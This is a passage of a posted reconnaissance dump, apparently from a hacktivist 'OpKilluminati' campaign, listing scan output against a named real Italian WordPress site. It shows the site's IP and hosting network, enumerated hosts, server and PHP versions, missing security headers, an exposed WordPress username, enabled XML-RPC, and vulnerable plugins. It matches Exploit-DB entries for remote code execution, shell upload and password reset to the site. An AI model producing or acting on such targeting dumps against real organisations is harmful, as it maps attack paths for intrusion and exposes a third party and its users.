  3907. [*] http://www.alexa.com/siteinfo/www.granloggiafemminile.it
  3908. [*] http://www.google.com/safebrowsing/diagnostic?site=www.granloggiafemminile.it
  3909. [*] https://censys.io/ipv4/77.238.18.215
  3910. [*] https://www.abuseipdb.com/check/77.238.18.215
  3911. [*] https://urlscan.io/search/#77.238.18.215
  3912. [*] https://github.com/search?q=77.238.18.215&type=Code
  3913. [INFO] Useful links related to AS20746 - 77.238.16.0/21:
  3914. [*] http://www.google.com/safebrowsing/diagnostic?site=AS:20746
  3915. [*] https://www.senderbase.org/lookup/?search_string=77.238.16.0/21
  3916. [*] http://bgp.he.net/AS20746
  3917. [*] https://stat.ripe.net/AS20746
  3918. [INFO] Date: 25/09/19 | Time: 11:00:22
  3919. [INFO] Total time: 1 minute(s) and 23 second(s)
  3920. ######################################################################################################################################
  3921. [*] Load target domain: granloggiafemminile.it
  3922. - starting scanning @ 2019-09-25 11:00:37
  3923.  
  3924. [+] Running & Checking source to be used
  3925. ---------------------------------------------
  3926.  
  3927. ⍥ Shodan [ ✕ ]
  3928. ⍥ Webarchive [ ✔ ]
  3929. ⍥ Dnsdumpster [ ✔ ]
  3930. ⍥ Certspotter [ ✔ ]
  3931. ⍥ Certsh [ ✔ ]
  3932. ⍥ Censys [ ✕ ]
  3933. ⍥ Bufferover [ ✔ ]
  3934. ⍥ Threatminer [ ✔ ]
  3935. ⍥ Securitytrails [ ✕ ]
  3936. ⍥ Binaryedge [ ✕ ]
  3937. ⍥ Virustotal [ ✕ ]
  3938. ⍥ Riddler [ ✔ ]
  3939. ⍥ Threatcrowd [ ✔ ]
  3940. ⍥ Entrust [ ✔ ]
  3941. ⍥ Hackertarget [ ✔ ]
  3942. ⍥ Findsubdomain [ ✔ ]
  3943.  
  3944. [+] Get & Count subdomain total From source
  3945. ---------------------------------------------
  3946.  
  3947. ⍥ Hackertarget: Total Subdomain (1)
  3948. ⍥ Findsubdomain: Total Subdomain (0)
  3949. ⍥ Certspotter: Total Subdomain (0)
  3950. ⍥ Threatminer: Total Subdomain (0)
  3951. ⍥ Certsh: Total Subdomain (0)
  3952. ⍥ BufferOver: Total Subdomain (1)
  3953. ⍥ Entrust: Total Subdomain (0)
  3954. ⍥ Threatcrowd: Total Subdomain (0)
  3955. ⍥ Dnsdumpster: Total Subdomain (4)
  3956. ⍥ Riddler: Total Subdomain (1)
  3957. ⍥ Webarchive: Total Subdomain (1)
  3958.  
  3959. [+] Parsing & Sorting list Domain
  3960. ---------------------------------------------
  3961.  
  3962. ⍥ Total [2]
  3963.  
  3964. - granloggiafemminile.it
  3965. - www.granloggiafemminile.it
  3966.  
  3967. ⍥ Total [2]
  3968.  
  3969. [+] Probe subdomain for working on http/https
  3970. ---------------------------------------------
  3971.  
  3972. - https://granloggiafemminile.it
  3973. - http://www.granloggiafemminile.it
  3974. - http://granloggiafemminile.it
  3975. - https://www.granloggiafemminile.it
  3976.  
  3977. ⍥ Total [4]
  3978.  
  3979.  
  3980. [+] Check Live Host: Ping Sweep - ICMP PING
  3981. ---------------------------------------------
  3982.  
  3983. ⍥ [LIVE] granloggiafemminile.it
  3984. ⍥ [LIVE] www.granloggiafemminile.it
  3985.  
  3986. [+] Check Resolving: Subdomains & Domains
  3987. ---------------------------------------------
  3988.  
  3989. ⍥ Resolving domains to: 77.238.18.215
  3990. ⍥ Resolving domains to: 77.238.18.215
  3991.  
  3992. [+] Subdomain TakeOver - Check Possible Vulns
  3993. ---------------------------------------------
  3994.  
  3995. ⍥ [FAILS] En: Unknown https://www.granloggiafemminile.it
  3996. ⍥ [FAILS] En: Unknown https://granloggiafemminile.it
  3997. ⍥ [FAILS] En: Unknown http://granloggiafemminile.it
  3998. ⍥ [FAILS] En: Unknown http://www.granloggiafemminile.it
  3999.  
  4000. [+] Checks status code on port 80 and 443
  4001. ---------------------------------------------
  4002.  
  4003. ⍥ [000] https://www.granloggiafemminile.it
  4004. ⍥ [000] https://granloggiafemminile.it
  4005. ⍥ [301] http://granloggiafemminile.it
  4006. ⍥ [200] http://www.granloggiafemminile.it
  4007.  
  4008. https://www.granloggiafemminile.it:443
  4009. https://granloggiafemminile.it:443
  4010.  
  4011. [+] Generate Reports: Make report into HTML
  4012. ---------------------------------------------
  4013.  
  4014. ⍥ Make template for reports
  4015. - output/09-25-2019/granloggiafemminile.it/reports
  4016.  
  4017. ⍥ Successful Created ..
  4018.  
  4019. [+] Sud⍥my has been sucessfully completed
  4020. ---------------------------------------------
  4021.  
  4022. ⍥ Location output:
  4023. - output/09-25-2019/granloggiafemminile.it
  4024. - output/09-25-2019/granloggiafemminile.it/report
  4025. - output/09-25-2019/granloggiafemminile.it/screenshots
  4026.  
  4027. ######################################################################################################################################
  4028. [I] Threads: 5
  4029. [-] Target: http://www.granloggiafemminile.it (77.238.18.215)
  4030. [M] Website Not in HTTPS: http://www.granloggiafemminile.it
  4031. [I] Server: nginx/1.6.2
  4032. [I] X-Powered-By: PHP/5.4.45-0+deb7u9
  4033. [L] X-Frame-Options: Not Enforced
  4034. [I] Strict-Transport-Security: Not Enforced
  4035. [I] X-Content-Security-Policy: Not Enforced
  4036. [I] X-Content-Type-Options: Not Enforced
  4037. [L] No Robots.txt Found
  4038. [I] CMS Detection: WordPress
  4039. [I] Wordpress Version: 4.1.9
  4040. [M] EDB-ID: 47361 "WordPress 5.2.3 - Cross-Site Host Modification"
  4041. [M] EDB-ID: 46460-wordpress-5
  4042. [M] EDB-ID: 46511 "WordPress Core 5.0 - Remote Code Execution"
  4043. [M] EDB-ID: 46662 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)"
  4044. [M] EDB-ID: 44949 "WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion"
  4045. [M] EDB-ID: 41963 "WordPress < 4.7.4 - Unauthorized Password Reset"
  4046. [M] EDB-ID: 41497 "WordPress < 4.7.1 - Username Enumeration"
  4047. [M] EDB-ID: 41223 "WordPress 4.7.0/4.7.1 - Content Injection (Python)"
  4048. [M] EDB-ID: 41224 "WordPress 4.7.0/4.7.1 - Content Injection (Ruby)"
  4049. [M] EDB-ID: 41962 "WordPress 4.6 - Remote Code Execution"
  4050. [M] EDB-ID: 42024 "WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)"
  4051. [M] EDB-ID: 40288 "WordPress 4.5.3 - Directory Traversal / Denial of Service"
  4052. [M] EDB-ID: 36844 "WordPress 4.2 - Persistent Cross-Site Scripting"
  4053. [I] Wordpress Theme: candidate
  4054. [-] WordPress usernames identified:
  4055. [M] Monica
  4056. [M] XML-RPC services are enabled
  4057. [I] Autocomplete Off Not Found: http://www.granloggiafemminile.it/wp-login.php
  4058. [-] Default WordPress Files:
  4059. [I] http://www.granloggiafemminile.it/license.txt
  4060. [I] http://www.granloggiafemminile.it/readme.html
  4061. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfifteen/genericons/COPYING.txt
  4062. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfifteen/genericons/LICENSE.txt
  4063. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfifteen/readme.txt
  4064. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfourteen/genericons/COPYING.txt
  4065. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfourteen/genericons/LICENSE.txt
  4066. [I] http://www.granloggiafemminile.it/wp-content/themes/twentyfourteen/genericons/README.txt
  4067. [I] http://www.granloggiafemminile.it/wp-content/themes/twentythirteen/genericons/COPYING.txt
  4068. [I] http://www.granloggiafemminile.it/wp-content/themes/twentythirteen/genericons/LICENSE.txt
  4069. [I] http://www.granloggiafemminile.it/wp-content/themes/twentythirteen/genericons/README.txt
  4070. [I] http://www.granloggiafemminile.it/wp-includes/ID3/license.commercial.txt
  4071. [I] http://www.granloggiafemminile.it/wp-includes/ID3/license.txt
  4072. [I] http://www.granloggiafemminile.it/wp-includes/ID3/readme.txt
  4073. [I] http://www.granloggiafemminile.it/wp-includes/images/crystal/license.txt
  4074. [I] http://www.granloggiafemminile.it/wp-includes/js/plupload/license.txt
  4075. [I] http://www.granloggiafemminile.it/wp-includes/js/swfupload/license.txt
  4076. [I] http://www.granloggiafemminile.it/wp-includes/js/tinymce/license.txt
  4077. [-] Searching Wordpress Plugins ...
  4078. [I] Calendar
  4079. [M] EDB-ID: 21715 "WordPress Plugin spider Calendar - Multiple Vulnerabilities"
  4080. [I] creare-eu-cookie-law-banner v0.1
  4081. [I] dhvc-form
  4082. [I] feed
  4083. [M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
  4084. [I] js_composer
  4085. [I] revslider
  4086. [I] the-events-calendar v3.9.2
  4087. [I] universefunder
  4088. [I] woocommerce v2.3.8
  4089. [M] EDB-ID: 43196 "WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal"
  4090. [I] Checking for Directory Listing Enabled ...
  4091. [-] Date & Time: 25/09/2019 11:09:07
  4092. [-] Completed in: 0:14:29
  4093. #######################################################################################################################################
  4094. Anonymous #OpKilluminati JTSEC Full Recon #8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement